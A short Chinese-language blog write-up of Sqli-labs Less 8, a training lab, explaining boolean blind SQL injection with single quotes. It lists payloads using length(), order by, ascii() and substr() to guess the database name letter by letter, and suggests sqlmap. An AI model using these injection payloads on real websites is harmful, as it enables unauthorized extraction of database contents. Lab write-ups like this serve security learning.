Sqli-labs - GET注入 - LESS 8

Get - Blind -Boolian Based -Single Quotes

函数

substr()函数:substr(a,b,c)从b位置开始,截取字符串a的c长度
ascii()函数:ascii()将某个字符转换为ascii值

如题,单引号布尔盲注,且页面无明显回显,但是能通过是否显示You are in判断语句是否正确

?id=1' and (length(database()))>0 --+

有显示,语句正确

猜字段,3

192.168.147.133/Less-8/?id=1' order by 3--+

同理,我们构造语句一个字母一个字母判断数据库名(ASCII值)

?id=1' and (select ascii(substr(database(),1,1)))>100–+
?id=1' and (select ascii(substr(database(),1,1)))=115–+
ASCII值115的字母是s

人力工作总是吃力不讨好,上sqlmap

记住,如果没有过滤关键字,sqlmap就足够用了

posted @ 2020-05-07 09:55  ch0bits  阅读(141)  评论(0编辑  收藏  举报